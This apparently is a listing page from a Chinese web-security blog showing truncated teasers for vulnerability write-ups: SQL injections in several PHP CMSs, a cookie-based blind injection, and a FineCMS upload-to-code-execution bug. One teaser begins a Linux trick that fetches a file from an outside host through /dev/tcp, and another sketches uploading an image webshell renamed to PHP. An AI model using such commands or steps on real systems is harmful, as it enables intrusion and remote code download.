因为测试模板。首先解决了私信问题。然后来到了投稿的地方在文件dmeng2.0/author.php 167行开始
Tccms sql注入#2
常量未定义。看到 /system/core/controller.class.php[php]private function forceAttack() {$attack = M...
phpyun SQL注入
在/model/qqconnect.class.php文件中: [php] function cert_action(){ $id=$_GET['id']; $arr=@explo...
Linux常用渗透小技巧
1.无wget nc等下载工具时下载文件 exec 5<>/dev/tcp/yese.yi.org/80 &&echo -e "GET /c.p...
DM企业建站系统前台盲注
前台cookie 时间盲注 该套cms主要的安全措施为htmlentities,在POST&&GET的输入点做了html实体化的操作,但是这并不转义单引号(默认不转...
FineCMS V5.0.10 任意文件上传&&任意代码执行&&任意SQL语句执行多个漏洞
注册个用户,修改头像,选择一张图片马: 抓包,修改post中tx参数中的jpg为php:
2